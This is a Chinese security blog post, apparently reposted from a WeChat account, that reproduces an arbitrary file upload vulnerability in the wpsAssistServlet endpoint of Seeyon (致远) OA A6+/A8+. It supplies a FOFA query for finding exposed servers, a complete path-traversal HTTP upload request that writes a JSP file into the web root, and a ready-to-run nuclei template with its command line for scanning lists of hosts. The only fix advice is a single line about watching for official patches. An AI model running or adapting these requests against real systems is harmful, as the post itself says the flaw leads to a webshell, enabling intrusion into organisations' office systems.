【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞

admin
admin
admin
138107
文章
113
评论
2023年10月31日01:35:21评论164 views字数 2806阅读9分21秒阅读模式


使



01

漏洞名称



致远OA wpsAssistServlet任意文件上传漏洞


02


漏洞影响


致远互联-OA  A6+企业版   A8+企业版

【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞



03


漏洞描述


2010年用友致远更名为致远协创;2017年更名为致远互联。用友致远协同管理软件精准定位于企事业组织行为管理的需求,融入先进的协同管理理念,运用领先的网络技术,是基于互联网的组织行为管理平台。用友致远协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、管理规范、资源整合、运营管控等难题,是组织管理的最佳实践。用友致远有A6和A8两大协同软件产品线:A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”。2007年底发布的A8协同管理软件,以强力支持集团化、多语言和跨平台应用为特点,被业界誉为“中国协同应用软件的新标准”。致远互联-OA wpsAssistServlet接口存在任意文件上传漏洞,黑客上传恶意文件后可以获取webshell。


04


FOFA搜索语句

app="致远互联-OA" && title="V8.0SP2"

【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞



05


漏洞复现


第一步,向目标发送如下数据包,其中path中的pajgatzw.jsp为回显文件

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/pajgatzw.jsp&fileId=2 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data; boundary=oklp586ac9dujytddee11e86fa698nmv
--oklp586ac9dujytddee11e86fa698nmvContent-Disposition: form-data; name="upload"; filename="majgatzw.xls"Content-Type: application/vnd.ms-excel
<% out.println("lnrrovkexhsxbzjwptmthmyjgnvgjhjk");%>  --oklp586ac9dujytddee11e86fa698nmv--

【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞


第二步,使用浏览器访问回显文件


【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞

证明存在漏洞




06


nuclei poc


poc文件内容如下

id: zhiyuan-wpsAssistServlet-fileuploadinfo:  name: 致远OA wpsAssistServlet任意文件上传漏洞  author: fgz  description: 用友致远有A6和A8两大协同软件产品线:A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”。2007年底发布的A8协同管理软件,以强力支持集团化、多语言和跨平台应用为特点,被业界誉为“中国协同应用软件的新标准”。致远互联-OA wpsAssistServlet接口存在任意文件上传漏洞,黑客上传恶意文件后可以获取webshell。  severity: critical  tags: fileupload,2023  metadata:    fofa-qeury: app="致远互联-OA" && title="V8.0SP2"    veified: true    max-request: 3
http:  - raw:      - |        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{randstr_1}}.jsp&fileId=2 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36        Accept-Encoding: gzip, deflate        Accept: */*        Connection: close        Content-Type: multipart/form-data; boundary={{randstr_2}}
        --{{randstr_2}}        Content-Disposition: form-data; name="upload"; filename="123.xls"        Content-Type: application/vnd.ms-excel
        <% out.println("{{randstr}}");%>          --{{randstr_2}}--
      - |        GET /{{randstr_1}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36        Accept: */*        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Connection: close        Content-Type: application/x-www-form-urlencoded        Upgrade-Insecure-Requests: 1
    matchers-condition: and    matchers:      - type: dsl        dsl:          - "status_code_2 == 200 && contains(body_2, '{{randstr}}')"

运行POC

nuclei.exe -t zhiyuan-wpsAssistServlet-fileupload.yaml -l 1.txt

【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞


07


修复建议


关注官方安全中心补丁。



原文始发于微信公众号(AI与网安):【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日01:35:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【在野漏洞复现】致远OA wpsAssistServlet任意文件上传漏洞https://cn-sec.com/archives/2160100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息